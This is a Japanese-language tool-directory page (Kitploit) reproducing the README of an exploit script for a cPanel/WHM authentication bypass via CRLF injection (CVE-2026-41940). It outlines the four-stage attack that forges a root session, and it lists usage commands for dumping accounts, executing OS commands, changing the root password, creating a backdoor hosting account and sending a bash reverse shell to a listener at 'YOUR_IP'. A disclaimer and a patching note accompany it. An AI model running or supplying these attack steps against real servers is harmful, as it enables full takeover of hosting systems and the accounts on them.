Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940 — cPanel/WHM 認証バイパス(ゼロデイ脆弱性) | Kitploit
ツール/GitHubGitHub/kill1234545/cve-2026-41940
認証と認可特権昇格永続化メカニズム脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテスト
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

cPanel/WHM 認証バイパス(ゼロデイ脆弱性)

リポジトリを見る
1023ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-41940: cPanel/WHM 認証バイパス (単一ターゲット & マルチターゲット)

免責事項: この文書および関連スクリプト (exploit.py) は、教育目的、セキュリティ研究、および許可を得たペネトレーションテストのためだけに提供されています。所有していないシステム、または明示的なテスト許可がないシステムに対してこのソフトウェアを使用しないでください。

概要

exploit.py は、cPanel & WHM における認証バイパス脆弱性 (CVE-2026-41940) を実証するスクリプトです。この脆弱性により、認証されていない攻撃者が CRLF インジェクションの欠陥を介してデーモンキャッシュにルートセッションを注入し、最終的に有効な認証情報なしでルートレベルの WHM アクセスを取得できます。

脆弱性分析とエクスプロイトの流れ

このエクスプロイトは、Basic 認証処理メカニズム内の CRLF (キャリッジリターン・ラインフィード) インジェクション脆弱性を、セッション伝播の欠陥と組み合わせて利用します。このスクリプトは攻撃を4段階で自動化します:

  1. 事前認証セッションの生成: 公開ログインエンドポイント (例: /login/ または /cgi/login.cgi) に接続し、ベースラインの未認証セッションクッキー (whostmgrsession) を取得します。
  2. CRLFインジェクション: Base64 エンコードされたペイロードを含む細工済みの Basic 認証ヘッダーを送信し、ルートセッションフィールドを直接 cpsrvd セッションキャッシュに注入します。サーバーのリダイレクト応答が生成されたセキュリティトークン (cpsess) を漏えいします。
  3. セッション伝播: 生のセッションクッキーが認証済み WHM エンドポイントに送信され、do_token_denied をトリガーして偽造セッションをデーモンキャッシュに伝播させ、有効な認証済みセッションにします。
  4. 検証: 制限された WHM API エンドポイント (例: /json-api/version) に偽造セッションを使用してアクセスし、ルートレベルのアクセスを確認します。

前提条件

  • Python 3.x
  • requests ライブラリ
root@kitploit:~
pip install requests

使用方法

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

引数

ターゲット選択

引数説明
--target URL単一の WHM URL (例: https://target:2087)
--target-file FILEターゲットを含むファイル (1行に1つの ip:port) — チェックモードが自動で有効化されます

ネットワーク & コアオプション

エクスプロイトオプション (バイパス後)

出力オプション

引数説明
--output FILEセッショントークンと詳細を JSON ファイルに保存

例

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

対話型シェルコマンド

--shell 使用時、以下のコマンドが利用可能です:


注意

最新の cPanel/WHM セキュリティパッチを直ちに適用してください。

ツールをダウンロード
引数説明
--threads Nマルチターゲットモード用の並行スレッド数 (デフォルト: 10)
--hostname HOSTHost ヘッダーを上書き — 自動検出が失敗した場合や誤ったホスト名になる場合に使用
--timeout Nリクエストごとのタイムアウト (秒) (デフォルト: 15)
--retries Nネットワークエラー時の再試行回数 (デフォルト: 3)
--cookie-name NAME特定のセッションクッキー名を強制 (省略時は自動検出)
--no-verifyステージ4の検証をスキップして続行
引数説明
--checkチェックのみのモード — エクスプロイトせずに脆弱性を検証 (--target-file 使用時は自動設定)
--password PASSroot パスワードを PASS に変更
--api FUNC特定の WHM JSON-API 関数を呼び出し
--api-params K=V,...--api 用のカンマ区切りパラメータ
--exec CMDWHM の scripts/run_script を介して OS コマンドを実行 (フォールバック: rawexec)
--sessionroot ワンクリックログイン URL を生成 — すぐに開いてください。トークンは急速に期限切れになります
--shell対話型 WHM シェルを起動 (単一ターゲットのみ)
--dumpサーバー情報をダンプ: バージョン、アカウント、DNSゾーン、権限
--add-user USER PASS DOMAIN新しい cPanel ホスティングアカウントを作成
--revshell LHOST LPORTリスナーに bash リバースシェルを送信
コマンド説明
api <function> [k=v ...]WHM JSON-API 関数を呼び出し (例: api version)
exec <command>WHM 経由で OS コマンドを実行 (例: exec id)
passwd <newpass>root パスワードを変更
dumpサーバー情報をダンプ
revshell <lhost> <lport>リバースシェルを送信
add <user> <pass> <domain>cPanel アカウントを作成
save <path>現在のセッションをファイルに保存
exit / quitシェルを終了